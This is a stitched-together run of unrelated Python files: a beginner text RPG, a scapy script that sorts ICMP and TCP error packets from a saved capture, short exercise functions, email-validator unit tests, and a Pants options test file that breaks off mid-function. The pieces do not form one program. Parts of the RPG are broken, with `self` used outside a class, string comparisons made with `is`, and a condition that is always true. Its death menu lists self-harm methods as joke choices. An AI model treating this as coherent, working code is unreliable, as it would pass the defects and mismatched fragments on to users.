quit_game_1()
def title_screen():
print('__________________________________')
print('_ Welcome To The Random Text RPG _')
print('__________________________________')
print(' _ Play _ ')
print(' _ Help _ ')
print(' _ Quit _ ')
title_screen_selection()
def help_menu():
print('__________________________________')
print('_ Welcome To The Random Text RPG _')
print('__________________________________')
print('- Use Up, Down, Left, Right To Move -')
print('- Type Your Commands To Do Them -')
print('- Use "Look" To Inspect Something -')
print('- Good Luck And Have Fun! -')
print('- Continue For All Commands')
help_action = input('Continue? Y/N \n' + '> ')
acceptable_help = ['y', 'n', 'yes', 'no', 'continue']
while help_action.lower() not in acceptable_help:
print("Unknown Action, Try Again.\n")
help_action = input('Continue? Y/N \n' + '> ')
if help_action.lower() in ['y', 'yes', 'continue']:
controls_1()
elif help_action.lower() in ['n', 'no']:
title_screen()
title_screen_selection()
def print_location():
print('\n' + '_' * (4 + len(rooms[myPlayer.location][DESCRIPTION])))
print('| ' + rooms[myPlayer.location][ZONENAME].upper() + ' ' * (len(rooms[myPlayer.location][DESCRIPTION])) + '|')
print('| ' + rooms[myPlayer.location][DESCRIPTION] + ' |')
print('_' * (4 + len(rooms[myPlayer.location][DESCRIPTION])))
def prompt():
print("\n" + "__________________________")
print("What Would You Like To Do?")
action = input("> ")
acceptable_actions = ['move', 'go', 'travel', 'walk', 'quit', 'examine', 'inspect', 'interact', 'look', 'level',
'help', 'control', 'controls', 'test', 'location', 'position', 'die', 'xp']
while action.lower() not in acceptable_actions:
print("Unknown Action, Try Again.\n")
action = input("> ")
if action.lower() == 'quit':
quit_game_2()
elif action.lower() in ['move', 'go', 'travel', 'walk']:
player_move(action.lower())
elif action.lower() in ['examine', 'inspect', 'interact', 'look']:
player_examine(action.lower())
elif action.lower() in ['help', 'control', 'controls', 'commands']:
controls_2()
elif action.lower() in ['test']:
player_test()
elif action.lower() in ['location', 'position']:
print_location()
elif action.lower() in ['die']:
die()
elif action.lower() in ['level']:
print(Player_Lvl)
elif action.lower() in ['xp']:
print(Xp)
def player_move(myAction):
ask = "Where Would You Like To Move To?\n> "
dest = input(ask)
if dest in ['up', 'north', 'u', 'n']:
destination = rooms[myPlayer.location][UP]
movement_handler(destination)
elif dest in ['down', 'south', 'd', 's']:
destination = rooms[myPlayer.location][DOWN]
movement_handler(destination)
elif dest in ['left', 'west', 'l', 'w']:
destination = rooms[myPlayer.location][LEFT]
movement_handler(destination)
elif dest in ['right', 'east', 'r', 'e']:
destination = rooms[myPlayer.location][RIGHT]
movement_handler(destination)
def movement_handler(destination):
print("\n" + "You Have Moved To The " + destination.title() + ".")
myPlayer.location = destination
print_location()
def player_examine(action):
if rooms[myPlayer.location][SOLVED]:
print("You Have Already Exhausted This Zone.")
else:
print("You Can Trigger A Puzzle Here.")
def player_test():
ask = "What Do You Want To Test?\n> "
test = input(ask)
if test in ['name']:
print("Name Is " + myPlayer.name)
elif test in ['class', 'job', 'role']:
print("Class Is " + myPlayer.job.title())
def quit_game_1():
ask = "Are You Sure You Want To Quit?\n> "
quitting = input(ask)
if quitting in ['yes', 'continue', 'y']:
quit()
elif quitting in ['no', 'n']:
title_screen()
title_screen_selection()
def quit_game_2():
ask = "Are You Sure You Want To Quit?\n> "
quitting = input(ask)
if quitting in ['yes', 'continue', 'y']:
quit()
elif quitting in ['no', 'n']:
main_game_loop()
def restart():
ask = "______________________________\nDo You Want To Restart?\n> "
restarting = input(ask)
if restarting in ['yes', 'continue', 'y']:
title_screen()
title_screen_selection()
elif restarting in ['no', 'n']:
print("______________________________\nClosing Game")
quit()
def main_game_loop():
while myPlayer.game_over is False:
prompt()
def print_header():
print("Version: Development")
print('_________________________________')
print("Welcome To This Game")
print("Type 'Help' For Commands")
print("Type 'Quit' To Exit")
print("Commands Are Not Case Sensitive")
print("To Save Choose Save1, Save2, Or Save3")
print('_________________________________')
print()
def controls_print():
print("________________________________________\nAll Commands\n________________________________________")
print("Use = Use an Item")
print("________________________________________\n1)Movement:\nGo, Move, Travel, Walk\n2)Directions:\n"
"(North, Up, N, U)\n(West, Left, W, L)\n(East, Right, E, R)\n(South, Down, S, D)")
print("________________________________________\nExamine, Look, Inspect Interact () = Look At A Object")
print("________________________________________")
print("Quit, Leave, Exit, Close = Exit The Game")
def controls_1():
controls_print()
controls_1_action = input('Continue?\n' + '> ')
acceptable_controls_1 = ['y', 'yes', 'continue']
while controls_1_action.lower() not in acceptable_controls_1:
print("Unknown Action, Try Again.\n")
controls_1_action = input('Continue?\n' + '> ')
if controls_1_action.lower() in ['y', 'yes', 'continue']:
title_screen()
title_screen_selection()
def controls_2():
controls_print()
controls_2_action = input('Continue?\n' + '> ')
acceptable_controls_2 = ['y', 'yes', 'continue']
while controls_2_action.lower() not in acceptable_controls_2:
print("Unknown Action, Try Again.\n")
controls_2_action = input('Continue?\n' + '> ')
if controls_2_action.lower() in ['y', 'yes', 'continue']:
main_game_loop()
def die():
die_action = input('How Do You Want To Die?\n> ')
acceptable_die = ['inside', 'fall', 'jump', 'disaster', 'stab', 'shoot', 'dehydrate', 'starve', 'hang',
'hang myself', 'shoot myself', 'starve myself']
while die_action.lower() not in acceptable_die:
print('Not A Way To Die Here...Sorry ¯\_(ツ)_/¯')
die_action = input('How Do You Want To Die?\n> ')
if die_action.lower() in ['hang', 'hang myself']:
dead_hang_list = ["hang"]
dead_hang = random.choice(dead_hang_list)
print(dead_hang)
restart()
# check inventory for rope
elif die_action.lower() in ['shoot', 'shoot myself']:
dead_shoot_list = ["shoot"]
dead_shoot = random.choice(dead_shoot_list)
print(dead_shoot)
restart()
# check inventory fo gun
elif die_action.lower() in ['starve', 'starve myself']:
dead_starve_list = ["starve"]
dead_starve = random.choice(dead_starve_list)
print(dead_starve)
restart()
elif die_action.lower() in ['dehydrate']:
dead_dehydrate_list = ["dehydrate"]
dead_dehydrate = random.choice(dead_dehydrate_list)
print(dead_dehydrate)
restart()
elif die_action.lower() in ['fall', 'jump']:
dead_jump_list = ["fall"]
dead_jump = random.choice(dead_jump_list)
print(dead_jump)
# check area for place to jump
restart()
elif die_action.lower() in ['stab']:
dead_stab_list = ["stab"]
dead_stab = random.choice(dead_stab_list)
print(dead_stab)
restart()
# check inventory for knife/sword
elif die_action.lower() in ['inside']:
dead_inside_list = ['You Believe You Are Dead Because All The "Pain" You Have Suffered Through',
'You Gave Up The Will To Live']
dead_inside = random.choice(dead_inside_list)
print(dead_inside)
restart()
# add random quotes
def position():
print("___________________________")
print("You are in the " + rooms[current_room]["name"])
print("Inventory : " + str(inventory))
if "item" in rooms[current_room]:
print("You see a " + rooms[current_room]["item"])
print("___________________________")
def game_loop():
global healthe
global action
global epos
global mypos
global potion
global Xp
creatures = [
Creature('Random PlaceHolder Name', 1),
Creature('c2', 1),
Creature('c3', 1),
Creature('c4', 1),
Creature('c5', 1),
Creature('c6', 1),
]
while True:
global current_room
print()
position()
def battle_sequence():
global healthe
global action
Random_Creature = random.choice(creatures)
print("You Are Fighting A {}".format(Random_Creature))
print("Battle Has Started")
while healthe >= 0:
action = input('What Is Your Move? : ')
print()
if action == "a":
healthe = healthe - 1
print("Enemy Health Is {}".format(healthe))
if healthe == 0:
healthe = 10
print("You Have Won!")
print()
break
print()
if epos == mypos:
print("Enemy Is Here")
battle_sequence()
epos = (random.choice(rooms))
print("Enemy {}".format(epos))
if potion == 0:
potion = potion + 1
print("You Are Out Of Potions")
elif action == "e" or action == "E":
potion = potion - 1
print("You Have {} Potions Remaining".format(potion))
# elif action == "West" or action == "WEST" or action == "west" or action == "a" or action == "A":
# myxpos = myxpos - 1
# print("You Are Standing At {},{}".format(myxpos, myypos))
# elif action == "East" or action == "EAST" or action == "east" or action == "d" or action == "D":
# myxpos = myxpos + 1
# print("You Are Standing At {},{}".format(myxpos, myypos))
# elif action == "South" or action == "SOUTH" or action == "south" or action == "s" or action == "S":
# myypos = myypos - 1
# print("You Are Standing At {},{}".format(myxpos, myypos))
# elif action == "North" or action == "NORTH" or action == "north" or action == "w" or action == "W":
# myypos = myypos + 1
# print("You Are Standing At {},{}".format(myxpos, myypos))
# elif action == "q" or action == "Q":
# print("You Are Standing At {},{}".format(myxpos, myypos))
# elif action == "Northwest" or action == "NORTHWEST" or action == "northwest" or action == "wa" or action == "WA":
# myxpos = myxpos - 1
# myypos = myypos + 1
# print("You Are Standing At {},{}".format(myxpos, myypos))
# elif action == "NORTHEAST" or action == "Northeast" or action == "northeast" or action == "wd" or action == "WD":
# myxpos = myxpos + 1
# myypos = myypos + 1
# print("You Are Standing At {},{}".format(myxpos, myypos))
# elif action == "sa" or action == "SA":
# myxpos = myxpos - 1
# myypos = myypos - 1
# print("You Are Standing At {},{}".format(myxpos, myypos))
# elif action == "sd" or action == "SD":
# myxpos = myxpos + 1
# myypos = myypos - 1
# print("You Are Standing At {},{}".format(myxpos, myypos))
elif action == "v":
Xp = Xp + 10000
print("My Xp {}".format(Xp))
if 0 <= Xp <= 9:
Player_Lvl = 0
elif 10 <= Xp <= 39:
Player_Lvl = 1
elif 40 <= Xp <= 79:
Player_Lvl = 2
elif 80 <= Xp <= 159:
Player_Lvl = 3
elif 160 <= Xp <= 319:
Player_Lvl = 4
elif 320 <= Xp <= 639:
Player_Lvl = 5
elif 640 <= Xp <= 1279:
Player_Lvl = 6
elif 1280 <= Xp <= 2559:
Player_Lvl = 7
elif 2560 <= Xp <= 5119:
Player_Lvl = 8
elif 5120 <= Xp <= 10239:
Player_Lvl = 9
elif 10240 <= Xp <= 20479:
Player_Lvl = 10
elif 20480 <= Xp <= 40959:
Player_Lvl = 11
elif 40960 <= Xp <= 81919:
Player_Lvl = 12
elif 81920 <= Xp <= 163839:
Player_Lvl = 13
elif 163840 <= Xp <= 327679:
Player_Lvl = 14
elif 327680 <= Xp <= 655359:
Player_Lvl = 15
elif 655360 <= Xp <= 1310719:
Player_Lvl = 16
elif 1310720 <= Xp <= 2621439:
Player_Lvl = 17
elif 2621440 <= Xp <= 5242879:
Player_Lvl = 18
elif 5242880 <= Xp <= 10485759:
Player_Lvl = 19
elif 10485760 <= Xp <= 20971519:
Player_Lvl = 20
elif 20971520 <= Xp <= 41943039:
Player_Lvl = 21
elif 41943040 <= Xp <= 83886079:
Player_Lvl = 22
elif 83886080 <= Xp <= 167772159:
Player_Lvl = 23
elif 167772160 <= Xp <= 335544319:
Player_Lvl = 24
elif 335544320 <= Xp <= 671088640:
Player_Lvl = 25
else:
print("This Is Not A Valid Action, Check If You Made A Typo")
def setup_game():
"""Name Collecting"""
question1 = "Hello What Is Your Name?\n"
for character in question1:
sys.stdout.write(character)
sys.stdout.flush()
time.sleep(0.05)
player_name = input("> ")
myPlayer.name = player_name
"""Job Handling"""
question2 = "What Is Your Class?\n"
question2added = "(You Can Choose Assault, Sniper, Mage, Or Heavy)\n"
for character in question2:
sys.stdout.write(character)
sys.stdout.flush()
time.sleep(0.05)
for character in question2added:
sys.stdout.write(character)
sys.stdout.flush()
time.sleep(0.01)
player_job = input("> ")
valid_jobs = ['assault', 'sniper', 'mage', 'heavy', 'test_to_long_to_type']
if player_job.lower() in valid_jobs:
myPlayer.job = player_job
print("You Are Now A " + player_job.title() + ".\n")
while player_job.lower() not in valid_jobs:
player_job = input("> ")
if player_job.lower() in valid_jobs:
myPlayer.job = player_job
print("You Are Now A " + player_job.title() + ".\n")
"""Player Stats"""
if myPlayer.job is 'assault':
self.hp = 150
self.mp = 40
elif myPlayer.job is 'sniper':
self.hp = 75
self.mp = 60
elif myPlayer.job is 'mage':
self.hp = 100
self.mp = 120
elif myPlayer.job is 'heavy':
self.hp = 250
self.mp = 20
elif myPlayer.job is 'test_to_long_to_type':
self.hp = 999
self.mp = 999
"""Introduction"""
question3 = "Welcome, " + player_name + " The " + player_job.title() + ".\n"
for character in question3:
sys.stdout.write(character)
sys.stdout.flush()
time.sleep(0.05)
speech1 = "Welcome To 'Place Holder Name'!\n"
speech2 = "Test1...\n"
speech3 = "Test2...\n"
speech4 = "Test3...\n"
for character in speech1:
sys.stdout.write(character)
sys.stdout.flush()
time.sleep(0.03)
for character in speech2:
sys.stdout.write(character)
sys.stdout.flush()
time.sleep(0.03)
for character in speech3:
sys.stdout.write(character)
sys.stdout.flush()
time.sleep(0.01)
for character in speech4:
sys.stdout.write(character)
sys.stdout.flush()
time.sleep(0.02)
print("_____________________")
print("_ Game Starting Now _")
print("_____________________")
main_game_loop()
'''
Failed Ideas...Yay:
Possibly For Rooms?
#legal_locs = [(0, 0), (0, 1), (0, 2), (0, 3), (0, 4), (0, 5), (1, 0), (1, 1), (1, 2), (1, 3), (1, 4), (1, 5),
# (2, 0),
# (2, 1), (2, 2), (2, 3), (2, 4), (2, 5), (3, 0), (3, 1), (3, 2), (3, 3), (3, 4), (3, 5), (4, 0),
# (4, 1),
# (4, 2), (4, 3), (4, 4), (4, 5), (5, 0), (5, 1), (5, 2), (5, 3), (5, 4), (5, 5)]
elif myxpos >= legal_locs:
myxpos = myxpos - 1
elif myxpos <= legal_locs:
myxpos = myxpos + 1
elif myypos >= legal_locs:
myypos = myypos - 1
elif myypos <= legal_locs:
myypos = myypos + 1
elif myxpos >= legal_locs_x:
myxpos = myxpos - 1
elif myxpos <= legal_locs_x:
myxpos = myxpos + 1
elif myypos >= legal_locs_y:
myypos = myypos - 1
elif myypos <= legal_locs_y:
myypos = myypos + 1
________________________________________________________________________________________________________________________
Possible New Additions:
Bosses?/Xp For Bosses/Loot For Bosses
Nothing Else To See Here
________________________________________________________________________________________________________________________
TODO:
Enemies, Plus Naming Such Enemies [WIP]
Rooms aka 5x5 area for now [WIP]
Currency System And Shop []
Random Loot For Enemies []
Progressing Better Loot For Higher Enemies []
Perk System For Certain Classes []
Health System []
Picking Up Loot And Inventory []
________________________________________________________________________________________________________________________
Complete:
Saving System(For Now) [x]
Movement Between Coordinates [x]
Potion Drinking System [x]
Controls(For Now) [x]
Battle System [x]
Random Enemy Spawns [x]
Random Enemies In Random Enemy Spawns [x]
XP And Leveling System [x]
________________________________________________________________________________________________________________________
Future Possibly:
A Visual Version Of The Game
A TTS Version Of This Game
A 3 Dimensional Version Of This Game In OpenGL Or A 3D Engine
Figuring Out The Process Of Porting A Game Onto Consoles?
Random Place Holder Idea
________________________________________________________________________________________________________________________
D:\RPG Game
D:\Code.Pylet Tutorials\throwaway.py
________________________________________________________________________________________________________________________
Old System
response = input("Start A New Game Or Load A Game? (Enter load1, load2, load3, Or New): ")
while response != "load1" and response != "Load1" and response != "LOAD1" and response != "load2" \
and response != "Load2" and response != "LOAD2" and response != "load3" and response != "Load3" \
and response != "LOAD3" and response != "new":
print(response + " is invalid input")
response = input("New game Or Load game? (Choose load1, load2, load3, Or new): ")
print()
if response == "load1":
try:
f = shelve.open("save1.dat")
attributes = f["attributes"]
f.close()
Name = attributes["Name"]
Race = attributes["Race"]
Class = attributes["Class"]
Weapon = attributes["Weapon"]
Xp = attributes["Xp"]
Player_Lvl = attributes["Player_Lvl"]
Currency = attributes["Currency"]
potion = attributes["potion"]
mypos = attributes["mypos"]
print("You Are A {} Wielding A {}. Your Name Is {}.".format(Class, Weapon, Name))
print(attributes)
except:
print("Save file is corrupt or doesn't exist")
response = input("New game Or Load game? (Choose load1, load2, load3, Or new): ")
elif response == "load2":
try:
f = shelve.open("save2.dat")
attributes = f["attributes"]
f.close()
Name = attributes["Name"]
Race = attributes["Race"]
Class = attributes["Class"]
Weapon = attributes["Weapon"]
Xp = attributes["Xp"]
Player_Lvl = attributes["Player_Lvl"]
Currency = attributes["Currency"]
potion = attributes["potion"]
mypos = attributes["mypos"]
print("You Are A {} Wielding A {}. Your Name Is {}.".format(Class, Weapon, Name))
print(attributes)
except:
print("Save file is corrupt or doesn't exist")
response = "not"
elif response == "load3":
try:
f = shelve.open("save3.dat")
attributes = f["attributes"]
f.close()
Name = attributes["Name"]
Race = attributes["Race"]
Class = attributes["Class"]
Weapon = attributes["Weapon"]
Xp = attributes["Xp"]
Player_Lvl = attributes["Player_Lvl"]
Currency = attributes["Currency"]
potion = attributes["potion"]
mypos = attributes["mypos"]
print("You Are A {} Wielding A {}. Your Name Is {}.".format(Class, Weapon, Name))
print(attributes)
except:
print("Save file is corrupt or doesn't exist")
response = "new"
if response == "new":
Name = input("What is your name?")
Race = input("What is your race? (Your choices are Human, Cyborg, and Robot.): ")
Class = input("What is your class? (Your choices are Assault, Sniper, and Mage.: ")
if Race == "Robot" or Race == "robot" or Race == "ROBOT":
Race = "Robot"
elif Race == "Human" or Race == "human" or Race == "HUMAN":
Race = "Human"
elif Race == "Cyborg" or Race == "cyborg" or Race == "CYBORG":
Race = "Cyborg"
if Class == "Assault" or Class == "assault":
Weapon = "Electric Rifle"
Class = "Assault"
print("You Are A {} Wielding A {}. Your Name Is {}.".format(Class, Weapon, Name))
elif Class == "Sniper" or Class == "sniper":
Weapon = "Pulse Sniper"
Class = "Sniper"
print("You Are A {} Wielding A {}. Your Name Is {}.".format(Class, Weapon, Name))
elif Class == "Mage" or Class == "mage":
Weapon = "Staff"
Class = "Mage"
print("You Are A {} Wielding A {}. Your Name Is {}.".format(Class, Weapon, Name))
else:
print("Not A Valid Choice")
print("You Are Starting At ({})".format(mypos))
print("You Are Starting With {} Potions".format(potion))
print("Enemy {}".format(epos))
print()
________________________________________________________________________________________________________________________
To Be Fixed:
elif action == "save1" or action == "SAVE1" or action == "Save1":
f = shelve.open("save1.dat")
attributes = {"Name": Name, "Race": Race, "Class": Class, "Weapon": Weapon, "Xp": Xp,
"Player_Lvl": Player_Lvl, "Currency": Currency, "potion": potion, "mypos": mypos}
f["attributes"] = attributes
f.sync()
f.close()
print("Game saved")
break
elif action == "save2" or action == "SAVE2" or action == "Save2":
f = shelve.open("save2.dat")
attributes = {"Name": Name, "Race": Race, "Class": Class, "Weapon": Weapon, "Xp": Xp,
"Player_Lvl": Player_Lvl, "Currency": Currency, "potion": potion, "mypos": mypos}
f["attributes"] = attributes
f.sync()
f.close()
print("Game saved")
break
elif action == "save3" or action == "SAVE3" or action == "Save3":
f = shelve.open("save3.dat")
attributes = {"Name": Name, "Race": Race, "Class": Class, "Weapon": Weapon, "Xp": Xp,
"Player_Lvl": Player_Lvl, "Currency": Currency, "potion": potion, "mypos": mypos}
f["attributes"] = attributes
f.sync()
f.close()
print("Game saved")
break
________________________________________________________________________________________________________________________
def print_location():
print('\n' + '_' * (4 + len(rooms[myPlayer.location][DESCRIPTION])))
if len(rooms[myPlayer.location][ZONENAME]) >= len(rooms[myPlayer.location][DESCRIPTION]):
print('| ' + rooms[myPlayer.location][ZONENAME].upper() + ' ' * -(len(rooms[myPlayer.location][DESCRIPTION])) + '|')
print('| ' + rooms[myPlayer.location][DESCRIPTION] + '|')
elif len(rooms[myPlayer.location][ZONENAME]) <= len(rooms[myPlayer.location][DESCRIPTION]):
print('| ' + rooms[myPlayer.location][ZONENAME].upper() + ' ' * (-2 + len(rooms[myPlayer.location][DESCRIPTION])) + '|')
print('| ' + rooms[myPlayer.location][DESCRIPTION] + ' ' * -(len(rooms[myPlayer.location][ZONENAME])) + ' |')
elif len(rooms[myPlayer.location][ZONENAME]) == len(rooms[myPlayer.location][DESCRIPTION]):
print('| ' + rooms[myPlayer.location][ZONENAME].upper() + ' ' + '|')
print('| ' + rooms[myPlayer.location][DESCRIPTION] + ' ' + '|')
print('_' * (4 + len(rooms[myPlayer.location][DESCRIPTION])))
'''
title_screen()
|
import ipcalc
import netifaces
import netaddr
import socket
# import dpkt
from scapy.all import *
import scapy
from pprint import pformat
ipfile=open("errorIPsIn50K.txt", "r");
errorips1=ipfile.readlines();
# icmp3=open("icmp3.txt", "wb")
# icmp11=open("icmp11.txt", "wb")
# rst=open("rstips.txt", "wb")
ips=open('errips.txt', "wb")
errortype=open("errortypes.txt", "wb")
counter=0
ipsanderrrors={}
# RST=0x04
SYN=0x02
ACK=0x10
pACK=0x18
spACK=0x20
errorips=[]
for ip in errorips1:
i=ip.rstrip()
errorips.append(i)
# arr=[]
# arr.append('192.168.1.4
# d='2.228.45.89'
# if d in errorips:
# print "FOUNDDDDDDDD"
def evalpackets(packet):
if packet[IP].src=='192.168.1.4':
pass
# print "."
elif packet.haslayer(ICMP):
dest=packet.getlayer(ICMP).dst
# if (packet.getlayer(ICMP).type==3) and str(dest) in errorips:
# print "TYPE 3"
# if dest in ipsanderrrors:
# pass
# else:
# ipsanderrrors[dest]='3'
if (packet.getlayer(ICMP).type==11) and str(dest) in errorips:
print "TYPE 11"
if dest in ipsanderrrors:
pass
else:
ipsanderrrors[dest]='11'
# icmp11.write(str(packet.getlayer(ICMP).dst))
elif packet.haslayer(TCP):
print "Tcp layer present"
# print "simple ip ", packet[IP].src
F=packet.getlayer(TCP).flags
if F and SYN or ACK or spACK or pACK:
"SKIPPING.........."
pass
else:
print "preflag ", F
if str(packet[IP].src) in errorips:
print "flag"
ipsanderrrors[packet.getlayer(TCP).src]='flag'
# rst.write(packet[IP].src)1
else:
"tcp missing"
if str(packet[IP].src) in errorips:
ipsanderrrors[packet[IP].src]='notcp'
# counter=counter+1
print len(ipsanderrrors)
sniff(offline="packetfile.pcap",prn=evalpackets,store=0)
print "Length of dict", len(ipsanderrrors)
for i in ipsanderrrors:
ips.write(str(i)+'\n')
errortype.write(str(ipsanderrrors[i])+'\n')
|
def count_positives_sum_negatives(arr):
if not arr:
return []
count_num = 0
sum_of_num = 0
for element in arr:
if element > 0:
count_num += 1
elif element < 0:
sum_of_num += element
return [count_num, sum_of_num]
|
while True:
name= input("Nhap vao ten: ")
if name.isalpha() == True:
break
|
import unittest
from check_email import check_email
class Test(unittest.TestCase):
def test_basic_email_true(self):
#check "@"
self.assertTrue(check_email("username@domain.com"))
def test_basic_email_true(self):
#check "."
self.assertTrue(check_email("username@do.main.com"))
def test_basic_email_false(self):
#check "@"
self.assertFalse(check_email("usernamedomain.com"))
def test_double_email_false(self):
#check "@"
self.assertFalse(check_email("usernam@@edo@main.com"))
def test_domain_true(self):
#domain [a-z 0-9_-]
self.assertTrue(check_email("username@do_main-007.com"))
def test_domain_false_symbol(self):
#domain [a-z 0-9_-]
self.assertFalse(check_email("username@do_main:007.com"))
def test_domain_dot_false(self):
#domain none dot
self.assertFalse(check_email("username@com"))
def test_domain_false(self):
#domain {3,256}
self.assertFalse(check_email("username@co"))
def test_domain_false257(self):
#domain {3,256}
my_email = "username@" + 'a'*300+".com"
self.assertFalse(check_email(my_email))
def test_domain_symbol(self):
#domain [^-]
self.assertFalse(check_email("username@-domain_007.com"))
def test_domain_symbol_error(self):
#domain [^-]
self.assertFalse(check_email("username@domain_007-.com"))
def test_domain_symbol_error2(self):
#domain [^-]
self.assertFalse(check_email("username@domain_007.com-"))
def test_domain_space(self):
#space domain error
self.assertFalse(check_email("username@do main.com"))
def test_domain__dot2(self):
#dot error
self.assertFalse(check_email("username@domcom."))
def test_domain__dot3(self):
#dot error
self.assertFalse(check_email("username@dom..com"))
def test_domain__dot4(self):
#dot error
self.assertFalse(check_email("username@.domcom."))
def test_name_error(self):
#name {128}
my_email = 'a'*129 + "@domain.com"
self.assertFalse(check_email(my_email))
def test_name_none(self):
#none name error
self.assertFalse(check_email("@domain.com"))
def test_name_space(self):
#space name error
self.assertFalse(check_email("a @domain.com"))
def test_name_double_dot(self):
#double dot error
self.assertFalse(check_email("user..name@domain.com"))
def test_name_double_dot2(self):
#dot error
self.assertFalse(check_email("username@domcom."))
def test_name_even_quotes(self):
#even quotes
self.assertTrue(check_email('"us"er"name"@domain.com'))
def test_name_odd_quotes(self):
#odd quotes error
self.assertFalse(check_email('us"er"name"@domain.com'))
def test_name_odd_quotes2(self):
#odd quotes error
self.assertFalse(check_email('us"ername@domain.com'))
def test_name_symbol1_check(self):
# "!" rule
self.assertTrue(check_email('username"!"@domain.com'))
def test_name_symbol1_false(self):
# "!" rule
self.assertFalse(check_email('user!name@domain.com'))
def test_name_symbol2_check(self):
# "," rule
self.assertTrue(check_email('user","name@domain.com'))
def test_name_symbol2_false(self):
# "," rule
self.assertFalse(check_email('user",name@domain.com'))
def test_name_symbol3_check(self):
# ":" rule
self.assertTrue(check_email('us":"ername@domain.com'))
def test_name_symbol3_check2(self):
# ":" rule
self.assertFalse(check_email('us":er"name@domain.com'))
def test_name_symbol3_false(self):
# ":" rule
self.assertFalse(check_email('us:ername@domain.com'))
def test_name_uppercase_false(self):
# Uppercase rule
self.assertFalse(check_email('usAername@domain.com'))
if __name__ == '__main__':
unittest.main()
|
# coding=utf-8
__author__ = 'Hanzhiyun'
def fibonacci(n):
terms = [0, 1]
i = 2
while i <= n:
terms.append(terms[i - 1] + terms[i - 2])
i += 1
return terms[n]
|
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import json
import shlex
import unittest.mock
from contextlib import contextmanager
from enum import Enum
from functools import partial
from pathlib import Path
from textwrap import dedent
from typing import Any, Callable, Dict, cast
import pytest
import toml
import yaml
from packaging.version import Version
from pants.base.build_environment import get_buildroot
from pants.base.deprecated import CodeRemovedError, warn_or_error
from pants.base.hash_utils import CoercingEncoder
from pants.engine.fs import FileContent
from pants.option.config import Config
from pants.option.custom_types import UnsetBool, file_option, shell_str, target_option
from pants.option.errors import (
BooleanConversionError,
BooleanOptionNameWithNo,
DefaultValueType,
FromfileError,
HelpType,
ImplicitValIsNone,
InvalidKwarg,
InvalidMemberType,
MemberTypeNotAllowed,
MutuallyExclusiveOptionError,
NoOptionNames,
OptionAlreadyRegistered,
OptionNameDoubleDash,
ParseError,
)
from pants.option.global_options import GlobalOptions
from pants.option.option_types import StrOption
from pants.option.options import Options
from pants.option.options_bootstrapper import OptionsBootstrapper
from pants.option.parser import Parser
from pants.option.ranked_value import Rank, RankedValue
from pants.option.scope import GLOBAL_SCOPE, ScopeInfo
from pants.option.subsystem import Subsystem
from pants.util.contextutil import pushd, temporary_dir, temporary_file, temporary_file_path
_FAKE_CUR_VERSION = "1.0.0.dev0"
def global_scope() -> ScopeInfo:
return ScopeInfo(GLOBAL_SCOPE, GlobalOptions)
def task(scope: str) -> ScopeInfo:
return ScopeInfo(scope, is_goal=True)
def intermediate(scope: str) -> ScopeInfo:
return ScopeInfo(scope)
def subsystem(scope: str) -> ScopeInfo:
return ScopeInfo(scope)
def create_options(
scopes: list[str],
register_fn: Callable[[Options], None],
args: list[str] | None = None,
*,
env: dict[str, str] | None = None,
config: dict[str, dict[str, Any]] | None = None,
extra_scope_infos: list[ScopeInfo] | None = None,
) -> Options:
options = Options.create(
env=env or {},
config=Config.load([FileContent("pants.toml", toml.dumps(config or {}).encode())]),
known_scope_infos=[*(ScopeInfo(scope) for scope in scopes), *(extra_scope_infos or ())],
args=["./pants", *(args or ())],
)
register_fn(options)
return options
# ----------------------------------------------------------------------------------------
# Boolean handling.
# ----------------------------------------------------------------------------------------
def register_bool_opts(opts: Options) -> None:
opts.register(GLOBAL_SCOPE, "--default-missing", type=bool)
opts.register(GLOBAL_SCOPE, "--default-true", type=bool, default=True)
opts.register(GLOBAL_SCOPE, "--default-false", type=bool, default=False)
opts.register(GLOBAL_SCOPE, "--unset", type=bool, default=UnsetBool)
opts.register(GLOBAL_SCOPE, "--implicit-true", type=bool, implicit_value=True)
opts.register(GLOBAL_SCOPE, "--implicit-false", type=bool, implicit_value=False)
opts.register(
GLOBAL_SCOPE,
"--implicit-false-default-false",
type=bool,
implicit_value=False,
default=False,
)
opts.register(
GLOBAL_SCOPE, "--implicit-false-default-true", type=bool, implicit_value=False, default=True
)
def test_bool_explicit_values() -> None:
def register(opt: Options) -> None:
opt.register(GLOBAL_SCOPE, "--opt", type=bool)
def assert_val(arg: str, expected: bool) -> None:
global_options = create_options(
[GLOBAL_SCOPE], register, [f"--opt={arg}"]
).for_global_scope()
assert global_options.opt is expected
assert_val("false", False)
assert_val("False", False)
assert_val("true", True)
assert_val("True", True)
def test_bool_defaults() -> None:
opts = create_options([GLOBAL_SCOPE], register_bool_opts).for_global_scope()
assert opts.default_missing is False
assert opts.default_true is True
assert opts.default_false is False
assert opts.unset is None
assert opts.implicit_true is False
assert opts.implicit_false is True
assert opts.implicit_false_default_false is False
assert opts.implicit_false_default_true is True
def test_bool_args() -> None:
opts = create_options(
[GLOBAL_SCOPE],
register_bool_opts,
[
"--default-missing",
"--default-true",
"--default-false",
"--unset",
"--implicit-true",
"--implicit-false",
"--implicit-false-default-false",
"--implicit-false-default-true",
],
).for_global_scope()
assert opts.default_missing is True
assert opts.default_true is True
assert opts.default_false is True
assert opts.unset is True
assert opts.implicit_true is True
assert opts.implicit_false is False
assert opts.implicit_false_default_false is False
assert opts.implicit_false_default_true is False
def test_bool_negate() -> None:
opts = create_options(
[GLOBAL_SCOPE],
register_bool_opts,
[
"--no-default-missing",
"--no-default-true",
"--no-default-false",
"--no-unset",
"--no-implicit-true",
"--no-implicit-false",
"--no-implicit-false-default-false",
"--no-implicit-false-default-true",
],
).for_global_scope()
assert opts.default_missing is False
assert opts.default_true is False
assert opts.default_false is False
assert opts.unset is False
assert opts.implicit_true is False
assert opts.implicit_false is True
assert opts.implicit_false_default_false is True
assert opts.implicit_false_default_true is True
@pytest.mark.parametrize("val", [False, True])
def test_bool_config(val: bool) -> None:
opt_names = (
"default_missing",
"default_true",
"default_false",
"implicit_true",
"implicit_false",
"implicit_false_default_false",
"implicit_false_default_true",
)
opts = create_options(
[GLOBAL_SCOPE], register_bool_opts, config={"GLOBAL": {opt: val for opt in opt_names}}
).for_global_scope()
for opt in opt_names:
assert opts[opt] is val, f"option {opt} has value {opts[opt]} but expected {val}"
@pytest.mark.parametrize("val", (11, "AlmostTrue"))
def test_bool_invalid_value(val: Any) -> None:
def register(opts: Options) -> None:
opts.register(GLOBAL_SCOPE, "--opt", type=bool)
